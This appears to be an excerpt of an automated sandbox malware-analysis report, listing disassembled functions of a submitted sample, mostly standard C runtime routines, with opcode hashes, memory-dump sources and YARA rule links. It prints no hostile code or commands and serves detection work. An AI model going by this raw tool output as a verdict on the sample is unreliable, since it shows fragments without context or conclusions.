                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd38992.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AddressHandleModuleProc
                                                                                                                                      • String ID: IsProcessorFeaturePresent$KERNEL32
                                                                                                                                      • API String ID: 1646373207-3105848591
                                                                                                                                      • Opcode ID: 118b5162a474c003ae69c9300a13838c9d8123de4a3b48a289e819fb4020d245
                                                                                                                                      • Instruction ID: 3bb3582238f4ecb0ba7b9e8fe578e45fdcf0af3c55e5dfe2a5e3893bc0ad87fb
                                                                                                                                      • Opcode Fuzzy Hash: 118b5162a474c003ae69c9300a13838c9d8123de4a3b48a289e819fb4020d245
                                                                                                                                      • Instruction Fuzzy Hash: 96F06230600A09E2DB105FA1ED1E2EFBB74BB80746F5101A19196B0194DF38D0B6825A
                                                                                                                                      Function 004146FA Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 29COMMONLIBRARYCODE
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • ___addlocaleref.LIBCMT ref: 0041470C
                                                                                                                                        • Part of subcall function 004145D2: InterlockedIncrement.KERNEL32(00000001), ref: 004145E4
                                                                                                                                        • Part of subcall function 004145D2: InterlockedIncrement.KERNEL32(?), ref: 004145F1
                                                                                                                                        • Part of subcall function 004145D2: InterlockedIncrement.KERNEL32(?), ref: 004145FE
                                                                                                                                        • Part of subcall function 004145D2: InterlockedIncrement.KERNEL32(?), ref: 0041460B
                                                                                                                                        • Part of subcall function 004145D2: InterlockedIncrement.KERNEL32(?), ref: 00414618
                                                                                                                                        • Part of subcall function 004145D2: InterlockedIncrement.KERNEL32(?), ref: 00414634
                                                                                                                                        • Part of subcall function 004145D2: InterlockedIncrement.KERNEL32(?), ref: 00414644
                                                                                                                                        • Part of subcall function 004145D2: InterlockedIncrement.KERNEL32(?), ref: 0041465A
                                                                                                                                      • ___removelocaleref.LIBCMT ref: 00414717
                                                                                                                                        • Part of subcall function 00414661: InterlockedDecrement.KERNEL32(?), ref: 0041467B
                                                                                                                                        • Part of subcall function 00414661: InterlockedDecrement.KERNEL32(?), ref: 00414688
                                                                                                                                        • Part of subcall function 00414661: InterlockedDecrement.KERNEL32(?), ref: 00414695
                                                                                                                                        • Part of subcall function 00414661: InterlockedDecrement.KERNEL32(?), ref: 004146A2
                                                                                                                                        • Part of subcall function 00414661: InterlockedDecrement.KERNEL32(?), ref: 004146AF
                                                                                                                                        • Part of subcall function 00414661: InterlockedDecrement.KERNEL32(?), ref: 004146CB
                                                                                                                                        • Part of subcall function 00414661: InterlockedDecrement.KERNEL32(00000000), ref: 004146DB
                                                                                                                                        • Part of subcall function 00414661: InterlockedDecrement.KERNEL32(?), ref: 004146F1
                                                                                                                                      • ___freetlocinfo.LIBCMT ref: 0041472B
                                                                                                                                        • Part of subcall function 00414489: ___free_lconv_mon.LIBCMT ref: 004144CF
                                                                                                                                        • Part of subcall function 00414489: ___free_lconv_num.LIBCMT ref: 004144F0
                                                                                                                                        • Part of subcall function 00414489: ___free_lc_time.LIBCMT ref: 00414575
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3678323240.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.3678208117.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3678437532.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3678481845.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3678481845.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3678481845.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3678630985.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd38992.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Interlocked$DecrementIncrement$___addlocaleref___free_lc_time___free_lconv_mon___free_lconv_num___freetlocinfo___removelocaleref
                                                                                                                                      • String ID: @.B
                                                                                                                                      • API String ID: 467427115-470711618
                                                                                                                                      • Opcode ID: 3857329619949c293296419ec2be8f51648e9d3bf58d3a63f1cc8ec60b1035b6
                                                                                                                                      • Instruction ID: 8e9b8205a585dc9325c25650a27042e0212317e7447dcce9b0fe23aa5a8dd77f
                                                                                                                                      • Opcode Fuzzy Hash: 3857329619949c293296419ec2be8f51648e9d3bf58d3a63f1cc8ec60b1035b6
                                                                                                                                      • Instruction Fuzzy Hash: BDE0863250192255CE35261D76806EF93A98FD3725B3A017FF864AF7D8EB2C4CC0809D
                                                                                                                                      Function 0040C748 Relevance: 6.1, APIs: 4, Instructions: 148COMMONLIBRARYCODE
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • __fileno.LIBCMT ref: 0040C77C
                                                                                                                                      • __locking.LIBCMT ref: 0040C791
                                                                                                                                        • Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1
                                                                                                                                        • Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3678323240.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.3678208117.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3678437532.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3678481845.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3678481845.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3678481845.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3678630985.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd38992.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: __decode_pointer__fileno__getptd_noexit__locking
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2395185920-0
                                                                                                                                      • Opcode ID: a22d1fa1ad15e425548c743ff76317c9d1fdeb5a65110bd21edd49740b19d0ba
                                                                                                                                      • Instruction ID: 30055f4621fb528cea72007990449f1feb1a7f288d573051c200dc5e1a244c20
                                                                                                                                      • Opcode Fuzzy Hash: a22d1fa1ad15e425548c743ff76317c9d1fdeb5a65110bd21edd49740b19d0ba
                                                                                                                                      • Instruction Fuzzy Hash: CC51CF72E00209EBDB10AF69C9C0B59BBA1AF01355F14C27AD915B73D1D378AE41DB8D
                                                                                                                                      Function 00405D00 Relevance: 6.1, APIs: 4, Instructions: 137COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3678323240.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.3678208117.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3678437532.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3678481845.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3678481845.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3678481845.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3678630985.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd38992.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _fseek_malloc_memset
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 208892515-0
                                                                                                                                      • Opcode ID: e2021bf9677ac04d29097cd60d098293ca774abcf3d3e4afca42f73e68fb5c2d
                                                                                                                                      • Instruction ID: b5a371ba5f9a3ad1fa090fb1a89082137fe8d6c03bc5c52cd66242ccf2a60741
                                                                                                                                      • Opcode Fuzzy Hash: e2021bf9677ac04d29097cd60d098293ca774abcf3d3e4afca42f73e68fb5c2d
                                                                                                                                      • Instruction Fuzzy Hash: 3541A572600F018AD630972EE804B2772E5DF90364F140A3FE9E6E27D5E738E9458F89
                                                                                                                                      Function 0040BAAA Relevance: 6.1, APIs: 4, Instructions: 137COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • __flush.LIBCMT ref: 0040BB6E
                                                                                                                                      • __fileno.LIBCMT ref: 0040BB8E
                                                                                                                                      • __locking.LIBCMT ref: 0040BB95
                                                                                                                                      • __flsbuf.LIBCMT ref: 0040BBC0
                                                                                                                                        • Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1
                                                                                                                                        • Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3678323240.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.3678208117.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3678437532.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3678481845.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3678481845.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3678481845.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3678630985.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd38992.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: __decode_pointer__fileno__flsbuf__flush__getptd_noexit__locking
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3240763771-0
                                                                                                                                      • Opcode ID: ce0de872f2bf1c80b5409081606229fa9c8f65028ffa0700073288fbc1af180c
                                                                                                                                      • Instruction ID: 72eaa501f89e5d914343e0f007c81726c853b1270fdaa85e4c7363b387074608
                                                                                                                                      • Opcode Fuzzy Hash: ce0de872f2bf1c80b5409081606229fa9c8f65028ffa0700073288fbc1af180c
                                                                                                                                      • Instruction Fuzzy Hash: B441A331A006059BDF249F6A88855AFB7B5EF80320F24853EE465B76C4D778EE41CB8C
                                                                                                                                      Function 0041529F Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 004152D3
                                                                                                                                      • __isleadbyte_l.LIBCMT ref: 00415307
                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000080,00000009,?,?,?,00000000,?,?,?,?), ref: 00415338
                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,?,?,?,?), ref: 004153A6
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3678323240.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.3678208117.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3678437532.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3678481845.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3678481845.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3678481845.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3678630985.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd38992.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3058430110-0
                                                                                                                                      • Opcode ID: 2839bf6a935194de417e4e3b9e78947074703b487fc663d1488f120054b34ef5
                                                                                                                                      • Instruction ID: 094900ada7e667e90e346a2540d450e67f5821ec0926a3c2ae07879bc245b0d1
                                                                                                                                      • Opcode Fuzzy Hash: 2839bf6a935194de417e4e3b9e78947074703b487fc663d1488f120054b34ef5
                                                                                                                                      • Instruction Fuzzy Hash: 1831A032A00649EFDB20DFA4C8809EE7BB5EF41350B1885AAE8659B291D374DD80DF59
                                                                                                                                      Function 004134DB Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3678323240.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.3678208117.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3678437532.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3678481845.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3678481845.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3678481845.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3678630985.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd38992.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3016257755-0
                                                                                                                                      • Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                                                                                      • Instruction ID: bfd0e68975b3765f24e543ba70b005e9871d43ed2f52156b65e62ceec70126f9
                                                                                                                                      • Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                                                                                      • Instruction Fuzzy Hash: DA117E7200014EBBCF125E85CC418EE3F27BF18755B58841AFE2858130D73BCAB2AB89
                                                                                                                                      Function 02166E28 Relevance: 5.0, Strings: 4, Instructions: 49COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3680156839.0000000002160000.00000040.00000800.00020000.00000000.sdmp, Offset: 02160000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_2160000_173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd38992.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: \;q$\;q$\;q$\;q
                                                                                                                                      • API String ID: 0-2933265366
                                                                                                                                      • Opcode ID: 4a7cece669b12d03f20542c068962d42d7ac8e97f1b59746bc1ae405820f9892
                                                                                                                                      • Instruction ID: c781a66d4d48334e7dea1fd06856a672a6b97027e4bdaff8c44da5f6a8c35846
                                                                                                                                      • Opcode Fuzzy Hash: 4a7cece669b12d03f20542c068962d42d7ac8e97f1b59746bc1ae405820f9892
                                                                                                                                      • Instruction Fuzzy Hash: 930184317805548FC724CA6DC448A3D77EEAF886A473A426AE902CB374DB35EC51C750